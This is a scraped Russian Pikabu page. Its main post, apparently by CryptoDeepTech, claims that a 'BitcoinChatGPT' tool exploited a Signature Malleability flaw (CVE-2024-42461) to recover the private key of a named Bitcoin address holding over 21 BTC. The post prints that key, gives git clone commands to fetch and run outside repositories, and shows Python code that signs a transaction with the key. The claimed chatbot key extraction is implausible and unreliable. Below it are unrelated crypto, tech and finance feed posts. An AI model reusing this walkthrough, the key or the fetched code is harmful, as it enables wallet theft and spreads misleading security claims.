Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Скайдом - пожалуй, самая красочная и интересная головоломка с действительно уникальными режимами игры!

Скайдом

Три в ряд, Головоломки, Казуальные

Играть

Топ прошлой недели

  • AlexKud AlexKud 38 постов
  • Animalrescueed Animalrescueed 36 постов
  • Oskanov Oskanov 7 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
0
CryptoDeepTech
CryptoDeepTech
9 месяцев назад

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3]⁠⁠

В первой части статьи мы провели большое исследование уязвимости Signature Malleability, угрожающей безопасности популярных криптовалют, таких как Bitcoin и Ethereum. Во второй части статьи мы рассмотрели на реальном примере механизмы эксплуатации CVE-2024-42461 в библиотеке Elliptic для ECDSA, используя биткоин-кошелек 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw, на котором были потеряны монеты на сумму 21.2529214 BTC, что на ноябрь 2024 года составляет 1,744,572.51 USD. В этой третьей части статьи мы рассмотрим методы поиска уязвимости Signature Malleability, как предотвращение угрозы для собственного криптовалютного кошелька Bitcoin и Ethereum мы можем воспользоваться и применить на примерах различных методов машинного обучение.

Воспользуемся списком из “Tutorials Power AI” широко применяемая категория искусственного интеллекта для введение бизнеса в различных сферах деятельности криптоанализа и крипографии в целом.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Команда установки:

git clone https://github.com/demining/Tutorials-Power-AI.git

cd Tutorials-Power-AI/

python tutorials.py

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

BitcoinChatGPT — это инновационный чат-бот на базе искусственного интеллекта, который помогает пользователям находить уязвимости в транзакциях криптовалюты Bitcoin. Преимущества и классификации BitcoinChatGPT дают возможность проверить ваш адрес Bitcoin на предмет различных схем атак на криптокошельки. Машинное обучение на основе криптоанализа дает нам полную возможность исследовать различные атаки на алгоритмы, используемые в экосистеме Bitcoin. Инструменты для извлечения приватого ключа из реестра Bitcoin Wallet широко популярны, где BitcoinChatGPT служит важным и полезным ресурсом для кибербезопасности.

Применим уязвимость CVE-2024-42461: Signature Malleability в библиотеке Elliptic для создания Raw транзакции с помощью процесса машинного обучение BitcoinChatGPT

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/1YGZiPtgY0vPQ3PwUvbAjQW8LcErVHRsT

State of a vulnerable transaction in Bitcoin: 01000000 ....01 ........0dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935 ............00000000 ........8b483045 ....0221 ...........00 ...........97255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe0 ....0220 ........1014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d5 .....0141 .....049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461 ....ffffffff 01 ....d204000000000000 ........1976 ............a914 ........d77522a2b18e0064aba02ca7f864a5bb22998259 ....88ac 00000000

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Соединим все выданные значение в одну общую строку с помощью Python-скрипта combinex.py:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000

Откроем опцию от BlockCypher «Decode A Transaction»:

https://live.blockcypher.com/btc/decodetx/

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

{ "addresses": [ "1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK", "1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw" ], "block_height": -1, "block_index": -1, "confirmations": 0, "double_spend": false, "fees": 2606688996428, "hash": "a5828ec5775b967c36ab5c6a0184aaa52fd64e6650d07287cc7688266c6dbb28", "inputs": [ { "addresses": [ "1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK" ], "age": 344419, "output_index": 0, "output_value": 2606688997662, "prev_hash": "35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d", ....... ....... .......

Обратим внимание на Bitcoin HASH160: d77522a2b18e0064aba02ca7f864a5bb22998259

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

https://github.com/demining/CryptoDeepTools/blob/dfc7da9a6b41d72253bfcb6ae6da2718de7d9b87/36SignatureMalleability/DecodeRawTX.txt#L31

Transaction Script

The above script has been decoded

BitcoinChatGPT создает структуру транзакции, используя HASH публичного ключа, где мы видим что Bitcoin address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw отправляет 1234 satoshi на тот же адрес внутри своей сети.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Bitcoin HASH160 был получен с помощью Python Script: wif_to_hash160.py

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

d77522a2b18e0064aba02ca7f864a5bb22998259

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/wif_to_hash160.py

Вопрос — Ответ:

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост
Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост
Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

https://github.com/demining/CryptoDeepTools/blob/main/36SignatureMalleability/KEYFOUND.privkey

============================= KEYFOUND.privkey ============================= Private Key HEX: 0x17e96966f15a56993e13f8c19ce34a99111ad768a051d9febc24b6d48cae1951 Private Key WIF: 5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur Bitcoin Address: 1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw Balance: 21.25292140 BTC ============================= KEYFOUND.privkey =============================

BitcoinChatGPT №5 Signature Malleability Vulnerability Algorithm

Уязвимая Raw транзакция

Создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction....

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

  • zmq

  • urllib3

  • requests

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

requirements.txt

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и внесем небольшие изменение в коде Python Script: main.py

from io import BytesIO from secp256k1 import * from sighash import * pk = PrivateKey.parse("5HzpNjEsxrpxPFqBKaoRSnFeq7RP57mvzwgoQFVtAJNZBpLVyur") pk.address() tx = bytes.fromhex("35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d") index = 0 send = "1LeEbwu667oPtQC5dKiGiysUjFM3mQaxpw" tx_in = TxIn(tx, index, b'', 0xffffffff) tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey'] tx_in._value = 2345 tx_ins = [ tx_in ] tx_outs = [ TxOut(1234, Tx.get_address_data(send)['script_pubkey'].serialize()) ] tx = Tx(1, tx_ins, tx_outs, 0, testnet=True) signature(tx, 0, pk) tx.serialize().hex() print(tx.serialize().hex()) f = open("RawTX.txt", 'w') f.write("" + tx.serialize().hex() + "" + "\n") f.close()

Запустим команду:

python main.py

Уязвимая транзакция создана!

Откроем файл RawTX в каталоге:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b48304502210097255916a3cc4f69d4fa16f68219d0b1798d392fb0dce5fb0a358510df8cabe002201014656120e0a6e7c8c4a79ee22b3cdd4f55435e3e9bf3ab7287ae16858dd9d50141049b4069d8237fae8f2417c71c5512ec1b0547b5597474480cc28ea1bbfeecaab8b90fdec161ad6ef4378f274a60b900452431533596bf3bd23e01202ebf679461ffffffff01d2040000000000001976a914d77522a2b18e0064aba02ca7f864a5bb2299825988ac00000000

Порядок выполнения действий на видео:

  1. Именно эту уязвимую RawTX мы рассматривали в начале данной статьи: ↩︎

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Процесс декодирование RawTX с помощью инструмента decoderaw

Как нам известно из prompt ответов модуля BitcoinChatGPT Signature Malleability Vulnerability Algorithm может быть использован для решения сложных криптографических задач.

Заключение

Существует множество методов обнаружения и предотвращения поддельных подписей в сети Bitcoin. Эти методы варьируются от простых решений, таких как увеличение количества подтверждений, до более сложных систем анализа аномалий и регулярного обновления протоколов безопасности. Эффективная защита требует комплексного подхода к обеспечению безопасности сети и постоянного мониторинга новых угроз. Поддельные подписи могут привести к мошенническим транзакциям и потере средств. Основные методы, используемые для обнаружения и предотвращения таких атак:

1. Увеличение количества подтвержденийОдним из простейших способов защиты от поддельных подписей является увеличение количества подтверждений транзакции перед ее окончательным принятием. Рекомендуется ждать не менее шести подтверждений, чтобы снизить вероятность успешной атаки. Это позволяет убедиться в том, что транзакция была включена в блок и не может быть отменена.2. Анализ блоков и транзакцийМайнинговое ПО и узлы сети анализируют блоки и транзакции на предмет конфликтов и аномалий. Это включает проверку подписи на соответствие формату, а также проверку значений r и s на допустимые диапазоны. Если значения находятся вне допустимых пределов, транзакция может быть отклонена.3. Внедрение систем анализа аномалийИспользование систем анализа аномалий позволяет выявлять подозрительные транзакции и цепочки блоков. Эти системы могут использовать алгоритмы машинного обучения для обнаружения необычного поведения в сети, что может указывать на попытки подделки подписей.4. Программное обеспечение для мониторинга сетиИнструменты, такие как Wireshark, могут быть использованы для анализа сетевого трафика и выявления подозрительных активностей. Мониторинг сетевого трафика позволяет выявлять атаки типа «Sybil» или «Eclipse», которые могут быть использованы для манипуляции с транзакциями.5. Регулярное обновление протоколов безопасностиРегулярное обновление программного обеспечения и протоколов безопасности помогает устранить известные уязвимости, такие как уязвимость DeserializeSignature, которая позволяет злоумышленникам создавать недействительные подписи. Обновления должны включать исправления для всех известных уязвимостей и улучшения безопасности.6. Многоуровневое подтверждениеИспользование нескольких уровней подтверждения транзакций может повысить безопасность сети. Это может включать дополнительные проверки со стороны узлов или использование сторонних сервисов для верификации подписей.

References:

  1. Odlyzko, Andrew; te Reile, Herman J. J. «Disproving Mertens Conjecture» Journal für die reine und angewandte Mathematik

  2. D. Simon (2007). «Selected applications of LLL in number theory» LLL+25 Conference. Caen, France.

  3. Regev, Oded. «Lattices in Computer Science: LLL Algorithm» New York University. Retrieved 1 February 2019.

  4. Silverman, Joseph. «Introduction to Mathematical Cryptography Errata» Brown University Mathematics Dept. Retrieved 5 May 2015.

  5. Bosma, Wieb. «4. LLL» Lecture notes. Retrieved 28 February 2010.

  6. Abderrahmane, Nitaj. Cryptanalysis of NTRU with two public keys // International Association for Cryptologic Research. — Caen, France.

  7. Bleichenbacher, Daniel and May, Alexander. New Attacks on RSA with Small Secret CRT-Exponents // International Association for Cryptologic Research. — Darmstadt, Germany.

  8. Xinyue, Deng. An Introduction to LLL Algorithm // Massachusetts Institute of Technology.

  9. Liu, Jiayang, Bi, Jingguo and Xu, Songyan. An Improved Attack on the Basic Merkle–Hellman Knapsack Cryptosystems // IEEE. — Beijing 100084, China.

  10. Lattice algorithms using floating-point arithmetic // The FPLLL development team. FPLLL, a lattice reduction library. — 2016.

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/wf6QwCpP3oc

Video tutorial: https://dzen.ru/video/watch/674116440bddfa35d730ca7a

Источник: https://cryptodeeptool.ru/signature-malleability

Исследование уязвимости Signature Malleability и компрометации приватного ключа в подписи Bitcoin [Часть №3] Криптовалюта, Стартап, Инновации, Информационная безопасность, Технологии, Чат-бот, Google, Тренд, Программа, Тестирование, Видео, YouTube, Длиннопост
Показать полностью 16 3
[моё] Криптовалюта Стартап Инновации Информационная безопасность Технологии Чат-бот Google Тренд Программа Тестирование Видео YouTube Длиннопост
3
23
real.goblin
real.goblin
1 год назад
Goblin
Серия В цепких лапах

Удаленный бэкап, вскрытие крипты, остров несвободы, Касперский и ОСы | В цепких лапах⁠⁠

Удаленный бэкап, вскрытие крипты, остров несвободы, Касперский и ОСы | В цепких лапах
https://oper.ru/news/read.php?t=1051626801

00:00 Начало
00:33 Государство и взлом криптокошельков
03:53 Доступная машина для работяг
05:20 Кто победит вирусы будущего
06:36 Свободный рынок и выключение острова
09:40 Как сделать доброе дело
11:20 Зачем Google удалил пенсионеров

Аудиоверсия:
https://oper.ru/video/getaudio/v_lapah_google.mp3

Показать полностью
[моё] Видео Видео ВК Техника Электроника Новинки Инновации Технологии Изобретения Железки Криптовалюта Информационная безопасность Негатив Касперский Asml Google Дмитрий Пучков
4
2
user4694911
user4694911
1 год назад

Не могу вывести деньги со своего кошелька телеграмм⁠⁠

Ку всем у меня странная ситуация я не могу вывести свои деньги, с кошелька там 31 доллар а было 39 они уменьшаются как мне их вывести они типа на Notcoine но в тоже время на Ton Space типо моем кошельке и вывести не могу ? Я помню когда что делал я застейкал и потом сделал так чтоб, вывести но нет когда ввожу хотя бы один 1 Not, пишет недостаточно средств, кто нибудь может помочь разобраться
И ещё писал в поддержку не отвечают, я думаю они ещё долго будут отвечать.

Не могу вывести деньги со своего кошелька телеграмм Криптовалюта, Telegram, Помощь, Криптобиржа, Что делать, Google, Вывод, Длиннопост
Не могу вывести деньги со своего кошелька телеграмм Криптовалюта, Telegram, Помощь, Криптобиржа, Что делать, Google, Вывод, Длиннопост
Показать полностью 2
Криптовалюта Telegram Помощь Криптобиржа Что делать Google Вывод Длиннопост
13
Cryptoant
Cryptoant
1 год назад

Google обновляет политику в отношении криптовалютных трастов⁠⁠

Google обновляет политику в отношении криптовалютных трастов.

Google анонсировал обновление политики в отношении рекламы криптовалют: на данный момент обновление касается рекламы трастов. К этому относятся финансовые продукты, который позволяют инвесторам торговать акциями трастов, владеющими большими пулами цифровых валют.

Новая политика вступит в силу 29 января 2024 года и потребует от рекламодателей, предлагающих услуги трастов, держащих криптовалюту в США, соответствовать требованиям и получить одобрение от Google, прежде чем они смогут размещать рекламу на своей платформе.

По данным Google, изменение политики направлено на уточнение требований к рекламе криптовалютных трастов, которые по своему роду деятельности отличаются от криптовалютных бирж или кошельков. Обо всех изменениях будет объявлено 29 января.

В Google заявили, что ожидают, что все рекламодатели будут соблюдать местные законы во всех регионах, на которые нацелена их реклама, и что эта политика будет применяться ко всем учетным записям, рекламирующим эти продукты по всему миру. Google также добавил, что рекламодатели, нарушившие политику, получат предупреждение как минимум за семь дней до того, как будут предприняты какие-либо действия по ограничениям.

В 2018 году Google запретил всю рекламу, связанную с криптовалютой, но позже ослабил запрет в 2019 году, разрешив регулируемым криптовалютным биржам размещать рекламу в США и Японии.

Google обновляет политику в отношении криптовалютных трастов Биткоины, Криптовалюта, Google, ВКонтакте (ссылка)

https://happycoin.club/google-smyagchit-prezhnij-zapret-i-ra...

https://support.google.com/adspolicy/answer/14293829?hl=en&a...

https://vk.com/runningbitcoin

Показать полностью 1
Биткоины Криптовалюта Google ВКонтакте (ссылка)
1
egor.datskiy
egor.datskiy
1 год назад

296 100 000 рублей комиссией за BTC-перевод⁠⁠

296 100 000 рублей комиссией за BTC-перевод Банк, Инновации, Чат-бот, Технологии, ChatGPT, Криптовалюта, Биткоины, Google, Информационная безопасность

83,65 BTC или ₽296 млн — столько заплатили комиссией при переводе 139,4 BTC с одного кошелька на другой.

Возможно, отправитель хотел ускорить перевод, изменив стандартную комиссию, но по ошибке установил её слишком высокой.

И заплатил самую крупную комиссию в истории крипты.

Куда я жмал.

Показать полностью 1
[моё] Банк Инновации Чат-бот Технологии ChatGPT Криптовалюта Биткоины Google Информационная безопасность
8
DigitalOcean
DigitalOcean
1 год назад

Топ IT-компаний, которые изменили мир⁠⁠

Сейчас работать в IT-сфере — престижно и выгодно. О зарплатах айтишников слагают легенды, а многие с радостью меняют свою привычную работу на айти. Журнал «Цифровой Океан» составил рейтинг IT-компаний со всего мира, куда мечтают попасть многие профессионалы. Уверены, даже Илон Маск не отказался бы от покупки одной из них!

Топ IT-компаний, которые изменили мир NFT, Криптовалюта, Экономика, IT, Илон Маск, Sap, IBM, Dell, Программирование, Программное обеспечение, Программист, Hewlett Packard, Информационная безопасность, Linux, Google, Интернет, Windows, Длиннопост

1. Dell: компьютерное ПО и облачные вычисления

Годовой доход: 92 млрд. долларов

Штат: 165 тысяч человек

Рыночная стоимость компании: 67 млрд. долларов

Говоря о топ IT-компаний, Dell — одна из самых прибыльных корпораций в мире: в 2015 году ее купил гигант EMC за 67 млрд. долларов. Говорят, что эта сделка считается самой внушительной по сумме во всей сфере. Интересно, что основал Dell 19-ти летний студент Майкл Делл еще в 1984 году. Изначально он хотел продавать компьютеры с возможностью выбора программного обеспечения под потребности конкретного клиента. И со временем этот бизнес вырос настолько, что Dell стала одним из самых популярным производителем ПК.

Топ IT-компаний, которые изменили мир NFT, Криптовалюта, Экономика, IT, Илон Маск, Sap, IBM, Dell, Программирование, Программное обеспечение, Программист, Hewlett Packard, Информационная безопасность, Linux, Google, Интернет, Windows, Длиннопост

2. IBM: аппаратное и программное обеспечение

Годовой доход: 60,5 млрд. долларов

Штат: 288 300 человек

Рыночная стоимость компании: 115 млрд. долларов

Компания специализируется на компьютерном оборудовании, ПО, а еще ее ценят лучшие IT-компании за услуги хостинга и консалтинга. История IBM – это постоянное внедрение инноваций и сотрудники, которые разрабатывают уникальные для рынка решения. Кстати, шестеро из штата IBM – лауреаты Нобелевской премии. Сама компания представлена в 175 странах и активно развивается в «умных» технологиях и анализе данных.

Топ IT-компаний, которые изменили мир NFT, Криптовалюта, Экономика, IT, Илон Маск, Sap, IBM, Dell, Программирование, Программное обеспечение, Программист, Hewlett Packard, Информационная безопасность, Linux, Google, Интернет, Windows, Длиннопост

3. Oracle: корпоративное ПО и облачное программирование

Годовой доход: 39 млрд. долларов

Штат: 135 тысяч человек

Рыночная стоимость компании: 181 млрд. долларов

Компания Oracle известна своими ERP-системами для управления бизнеса, которые приобретают крупные IT-компании и не только. Благодаря своим функциональным решениям, Oracle представлена в 175 странах мира и имеет более 400 тысяч клиентов. Сейчас она активно продвигает на рынок услуги «умных» систем, интегрирует облачные платформы, занимается разработкой искусственного интеллекта и машинного обучения.

Топ IT-компаний, которые изменили мир NFT, Криптовалюта, Экономика, IT, Илон Маск, Sap, IBM, Dell, Программирование, Программное обеспечение, Программист, Hewlett Packard, Информационная безопасность, Linux, Google, Интернет, Windows, Длиннопост

4. HP Enterprise: искусственный интеллект, хранение данных

Годовой доход: 49,95 млрд. долларов

Штат: 59 400 человек

Рыночная стоимость компании: 18,2 млрд. долларов

Вышла на рынок в октябре 2015 года, когда Hewlett Packard распалась на HP Inc и HPE. Сейчас HP Enterprise входит в топ ИТ-компаний, предоставляющих услуги в области SAAS и ПО. В основном все эти решения предназначены для корпоративных клиентов: серверы, системы и сети для хранения данных, многоуровневые облачные инфраструктуры. В HP Enterprise есть собственные исследовательские лаборатории, сотрудники которых более 75 лет занимаются инновациями. А услуги компании выбирают как большие бизнес-гиганты, так и стартапы регионального уровня.

Топ IT-компаний, которые изменили мир NFT, Криптовалюта, Экономика, IT, Илон Маск, Sap, IBM, Dell, Программирование, Программное обеспечение, Программист, Hewlett Packard, Информационная безопасность, Linux, Google, Интернет, Windows, Длиннопост

5. SAP: корпоративное ПО

Годовой доход: 27,8 млрд. евро

Штат: 100 330 человек

Рыночная стоимость компании: 151 млрд. долларов

Популярные IT-компании знакомы с SAP, как с успешным разработчиком бизнес-приложений. Ее история началась в далеком 1972 году с производства системы финансового учета. Cегодня лучшие айти-компании и другие игроки бизнеса используют решения от этой корпорации. А еще именно разработчики SAP создали первую ERP-систему, с помощью которой можно управлять поставками и логистикой.

Топ IT-компаний, которые изменили мир NFT, Криптовалюта, Экономика, IT, Илон Маск, Sap, IBM, Dell, Программирование, Программное обеспечение, Программист, Hewlett Packard, Информационная безопасность, Linux, Google, Интернет, Windows, Длиннопост

Если вы хотите быть в курсе мира высоких технологий, читайте «Цифровой Океан» с любого гаджета или офлайн. Например, в разделе «Глубина» можно найти вдохновляющие биографии миллионеров в сфере IT и узнать последние новости.

Показать полностью 6
NFT Криптовалюта Экономика IT Илон Маск Sap IBM Dell Программирование Программное обеспечение Программист Hewlett Packard Информационная безопасность Linux Google Интернет Windows Длиннопост
5
DELETED
2 года назад

В Google появилась фишинговая реклама Celer Bridge, в результате чего пользователи потеряли 900 000 долларов⁠⁠

23 августа Scam Sniffer, известная платформа по борьбе с мошенничеством в сообществе Web3, выпустила предостерегающее сообщение относительно новой волны фишинга поисковой рекламы Google. Предупреждение последовало за удручающим инцидентом, когда жертва понесла ошеломляющие убытки в размере 900 000 долларов из-за вредоносной рекламы Celer Bridge.

Способ действия этой аферы особенно коварен. Когда пользователи выполняют поиск в Google, в рекламе отображается кажущийся подлинным домен, связанный с проектом. Однако после нажатия ссылка перенаправляется на фишинговый веб-сайт, способствуя серьезному нарушению доверия и безопасности.

Последствия ужасны для тех, кто непреднамеренно становится жертвой этой схемы. При подключении к криптовалютному кошельку мошенническая реклама запускает вредоносные подписи для кражи активов. Последующее одобрение подписи активов приводит к немедленной краже, в результате чего жертвы страдают от потери.

Фишинг, тактика киберпреступников, которая включает в себя маскировку под законные организации, по-прежнему нацелена на крипто-энтузиастов. Эти мошенники используют доверие жертв, принуждая их к передаче закрытых ключей или личной информации. Затем украденные данные используются для истощения запасов криптовалюты.

Примечательно, что в аналогичном ключе в прошлом году Celer столкнулся с проблемами, связанными с фишингом. После атаки с отравлением DNS, которая обошлась пользователям в 240 000 долларов, платформа призвала пользователей отозвать разрешения на подозрительные контракты.

Хотя часть пользователей сталкивалась с вредоносными смарт-контрактами во время использования bridge, ядро протокола осталось незатронутым.

В результате несвязанного инцидента Terra, блокчейн уровня 1, столкнулся с нарушением выходных, которое позволило хакерам организовывать фишинговые атаки на посетителей. Хакеры воспользовались взломанным доступом, чтобы побудить пользователей подключать онлайн-или аппаратные кошельки, подчеркивая бдительность в отношении домена terra (dot) money.

источник

В Google появилась фишинговая реклама Celer Bridge, в результате чего пользователи потеряли 900 000 долларов Криптовалюта, Google, Уязвимость, Реклама
Показать полностью 1
Криптовалюта Google Уязвимость Реклама
1
110
RationalAnswer
RationalAnswer
Павел Комаровский об инвестициях и рациональности
Лига биржевой торговли
2 года назад

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска⁠⁠

Всё самое важное, что произошло за неделю в мире финансов в России и в мире: Евросоюз «потерял» больше $200 миллиардов российских резервов, главный Zoom’ер сократил себе зарплату в 50 раз, американские регуляторы продолжают прижимать криптобиржи, а также новая постоянная рубрика – «хорошая новость недели»! (Видеоверсия выпуска здесь.)

Бюджет РФ оказался шопоголиком

Январь этого года российский бюджет закрыл с дефицитом в 1,8 трлн рублей – что составляет примерно 60% от всего запланированного на 2023 год дефицита. Причиной таких рекордов стал рост расходов почти на 60% по сравнению с январем прошлого года и одновременное падение доходов на 35% (см. позапрошлый выпуск про проблемы с ценами на нефть).

Впрочем, Минфин уже официально заявил, что «всё идет по плану»: просто чиновники с большим энтузиазмом вышли с новогодних отпусков и очень торопятся как можно больше всякого накупить наперед; а доходы падают как бы «понарошку» из-за бухгалтерских особенностей учета денежных потоков в только-только внедренной системе Единого налогового платежа. Хм-м.

Тем временем, правительство уже непрозрачно намекает представителям бизнеса на то, что затыкать дырку в бюджете придется именно им – с помощью так называемого «однократного добровольного взноса» в казну. Очень надеюсь на то, что законодательную базу под это дело примут оперативно, и она прояснит некоторые неясные моменты: «как часто надо будет перечислять в бюджет однократный взнос?», «какие будут наказания за отказ от добровольного взноса?», ну и так далее.

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

Представляю, что именно с таким выражением лица вице-премьер Андрей Белоусов обсуждает эту инициативу с представителями бизнеса: «Есть добровольный взнос? А если найду?»

ЕС использует магию вне Хогвартса

Евросоюз заявил, что он уже почти придумал, как передать в пользу Украины замороженные резервы России на $258 миллиардов. Только вот единственная загвоздка заключается в том, что ЕС не знает, где конкретно лежит более 85% от этой суммы.

У меня, если честно, столько вопросов! Как можно заморозить то, что ты еще не обнаружил? Что это за колдунство? Значит ли это, что Европейской комиссии предоставили ранний доступ к игре Hogwarts Legacy?!

Дефицитище российского бюджета, нейросетевые страдания Гугла, а также лайковый баттхерт Илона Маска Новости, Финансы, Инвестиции, Налоги, Биржа, Фондовый рынок, Экономика, Бюджет, Дефицит, Евросоюз, ZOOM Cloud Meetings, ChatGPT, Google, Microsoft, Илон Маск, X (Twitter), Криптовалюта, Криптобиржа, Binance, Длиннопост

Больше бирж богу бирж!

СПБ Биржа, брокер Freedom Finance и некая некоммерческая организация хотят создать в Казахстане новую биржу ITS для торговли международными бумагами из США, Европы и Китая. Потрейдить туда обещают пускать и россиян в том числе.

